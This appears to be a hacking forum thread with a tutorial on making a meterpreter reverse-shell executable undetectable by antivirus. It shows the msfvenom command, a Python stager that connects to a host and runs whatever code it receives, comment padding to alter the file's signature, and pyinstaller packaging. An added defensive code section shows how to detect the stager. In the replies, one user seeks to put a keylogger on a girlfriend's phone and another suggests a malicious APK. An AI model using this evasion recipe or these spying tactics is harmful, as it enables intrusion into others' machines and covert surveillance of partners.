Forum Thread: Creating a Completely Undetectable Executable in Under 15 Minutes!

Hello everyone, this is my first post so play nice with me.
We are going to create an undetectable (meterpreter/shell/vnc) executable in under 15 minutes.

Henceforth, what I mean by undetectable is that it is detected by 0 antivirus engines. Trust me, I've tried and it's possible.

But you ask, how is this possible?
Let me explain how AVs detect threats in quick and simple language.

When you scan an .exe or any other file, the AV doesn't scan the actual code for bad stuff. It takes the file's signature and searches its database to see whether it's a threat or not. Simple.

Typically many new executables aren't detected until it's too late.

So, how do we change the signature, and how do we infect the user?
Let's do this!

Note: All tools were used on a fresh Kali system, meaning that they are already preinstalled.

Step 1: Boot Up Kali and Create a Basic Executable

First we need to create a basic script with msfvenom to make the executable.
Run the command:

msfvenom -p python/meterpreter/reverse_tcp LHOST=ANYIP LPORT=ANYPORT R > anyname.py

Here is mine.

Step 2: Decoding and Editing the Source Code

Take the .py file you've created and open it with any text editor. It should look like this.

Now we need to decode it with a base64 decoder.
Take the highlighted pink part and copy it.
Paste it into any decoder online. I used this website.
Paste it into the text box and click on decode.

And look at that! We've decoded the source code.
Naturally this code is public knowledge and all AVs know about it. So let's change the code a bit.
Copy the source code and paste it into the encoder.

Add some blank lines between the lines of code and insert comments such as:
# Anything can go here
Add as many as you can. The more, the better.
Here's what I did.

#True
import socket,struct
#DANK
s=socket.socket(2,socket.SOCK_STREAM)
#WOW
s.connect(('192.168.0.1',3333))
#YOU HAD ONE JOB
l=struct.unpack('>I',s.recv(4))[0]
#NICE AV
d=s.recv(l)
#LOL NEVER MIND
while len(d)<l:
    d+=s.recv(l-len(d))
#WHOA
exec(d,{'s':s})

— See?

As you can see, there are some random messages placed in between the lines of code. The # marks a comment, so it doesn't affect the code and Python will just skip it. Comments are there for human code reviewers to see what's going on.

Now, once that's finished, copy that code and paste it into the encoder.

That's a lot of symbols.
Copy the output and paste it over the pink part of the Python script you opened earlier.

As you can see, it dramatically increased the size of the code.
Save it now.

Step 3: Convert It into an Executable (.exe)

Now, unless you are targeting a Windows-based client there is no need for this.
Linux has built-in Python support (at least to some extent).
Mac has built-in Python support.

Windows doesn't, and the average consumer doesn't install Python on their computer. So what do we do?
Make it into an .exe executable.

Run the command:
pyinstaller 'Your .py file here'
That's it!
Wait for it to finish.
Once it's finished, it will place the result in a specific directory.
Usually it's in /root/dist/nameofyourfile/.

Step 4: Testing the Executable Against the AV.

Naturally this isn't a good idea, because many AV vendors use VirusTotal to see new viruses.
But it is perfect for our purpose, because a computer can never outsmart an always-changing virus.

So take your .exe file and scan it!

As you can see, we have a 0/54 detection ratio, meaning no one found it!
This has many uses. The scenarios are endless.

GL, HF!
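A defender's view of step 2 (and of the reply below about signature analysis being static pattern matching), as an added example that is not part of the original post: the comment padding and the base64 wrapping change the file's bytes but not its structure, so a scanner that decodes embedded base64 and normalizes the Python through its AST sees the same stager either way. The sample stager and wrapper are constructed inline from the code shown in the post (with the missing [0] index restored) and are only parsed, never run; the pattern names are my own, and ast.unparse needs Python 3.9 or later.

```python
import ast, base64, re

# Constructed sample: the comment-padded stager shown in the post, with the
# missing [0] index restored. It is only parsed here, never executed.
PADDED_STAGER = """#True
import socket,struct
#DANK
s=socket.socket(2,socket.SOCK_STREAM)
#WOW
s.connect(('192.168.0.1',3333))
#YOU HAD ONE JOB
l=struct.unpack('>I',s.recv(4))[0]
#NICE AV
d=s.recv(l)
#LOL NEVER MIND
while len(d)<l:
    d+=s.recv(l-len(d))
#WHOA
exec(d,{'s':s})
"""
# The same stager with the padding stripped, i.e. what the decoder showed in step 2.
CLEAN_STAGER = "\n".join(ln for ln in PADDED_STAGER.splitlines() if not ln.startswith("#"))
# Constructed outer script: the padded stager base64-wrapped inside exec(), as in step 2.
WRAPPER = "import base64;exec(base64.b64decode('%s'))" % base64.b64encode(PADDED_STAGER.encode()).decode()
# Structural markers of this stager family (hypothetical names), matched on normalized source.
STAGER_PATTERNS = {
    "raw_socket": r"socket\.socket\(",
    "length_prefixed_recv": r"struct\.unpack\(['\"]>I['\"]",
    "exec_of_received_data": r"\bexec\(",
}

def normalize(src):
    # Round-trip through the AST: comments, blank lines and spacing disappear.
    return ast.unparse(ast.parse(src))

def extract_b64_sources(src):
    # Decode every string constant that is valid base64 and parses as Python.
    found = []
    for node in ast.walk(ast.parse(src)):
        if not (isinstance(node, ast.Constant) and isinstance(node.value, str) and len(node.value) >= 16):
            continue
        try:
            inner = base64.b64decode(node.value, validate=True).decode("utf-8")
            ast.parse(inner)
            found.append(inner)
        except (ValueError, SyntaxError):  # not base64, not UTF-8, or not Python
            pass
    return found

def stager_indicators(src):
    # Names of the patterns present once the source is normalized.
    text = normalize(src)
    return [name for name, pat in STAGER_PATTERNS.items() if re.search(pat, text)]
```

Because the padded and clean stagers normalize to identical text, a hash taken over normalize() (rather than over the raw file) is the same for both, which is the kind of signature the comment trick does not change.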

17 Responses

Nice tutorial. I'll be checking it out tonight. Thanks.

I'm having an issue with it. When I try to run it on Windows 7 64-bit, I get an error message: "The version of this file is not compatible with the version of Windows..."

I'm guessing that it's because it's a 32-bit exe on a 64-bit OS, but shouldn't pyinstaller make it compatible?

It still won't work, even if I do not change anything in the source code.

Any ideas on getting it to work?

Hmm.
Okay. It's a 64-bit OS, so it should be able to work.
There are other python to exe programs.
Try to use py2exe.

I got the same issue. How did you manage it?

Haven't figured it out yet. I pretty much gave up. I'd rather work with Shellter.

I just learned about Shellter, but I am afraid that it will get caught by AV soon, like Veil-Evasion. I used to use AES encryption; now antiviruses detect it. BTW, I have a question: Shellter doesn't seem to start with full permissions even though I am root. In each step it says access denied rmem_error. I am using Kali.

Nice tutorial, it's working well. Now I know an easy way to make my files FUD!

Yeah, I'm thinking about making a tool like Veil-Evasion.
How's that sound?

This is a great tutorial! Why don't AVs scan the actual code?

That would be impractical, slow and almost impossible.
Most executables are encrypted to protect against people copying and pasting them.

AVs don't have a human brain, meaning that they can't scan code and say 'Wait, the code looks really sketchy. I'm removing it.'

But where AVs shine is the removal process. Once the AV finds it, you're probably dead meat. I've had scenarios where Malwarebytes caught me, but I killed it just in time.

Anyway, most users don't need an anti-virus, just don't install sketchy programs.

It's not entirely true that AVs don't scan the code. Signature analysis does static code analysis using extracted code patterns from previously analyzed malicious files. If a specific code pattern is found within a file, the AV will start flagging it and may potentially be seen as suspicious. If enough flags are raised, the file in question will be labelled as malicious depending on the level of sensitivity set in the AV. So in a sense, you could say that an AV knows whether a file is suspicious or not.

P.S. Is your file supposed to be a PE file? It's seen as an ELF64 on the Virus Total scan.

Personally I would disagree with your last statement. Drive-by download malware attacks are increasing. They infect through vulnerabilities. But yeah, the majority of infections are user-installed.

It doesn't matter. Drive-by vulnerabilities are still being added to AV databases, or not at all.

Many AVs don't even fix or monitor vulnerabilities. That relies on the user downloading OS security updates. Users who use Windows 10 are naturally unaffected by these, but anyone who uses anything else is affected.

Can you please help me install keylogger remotely on my girlfriend's phone??

Meterpreter for Android doesn't have a built-in keylogger.
However, you may create a malicious package (an .apk, if Android) to piggyback on and install a more capable spying program.

IMO, keylogging isn't really all that useful. I personally use it to gain passwords if they are text-based. Otherwise you are just flooded with every letter she types.
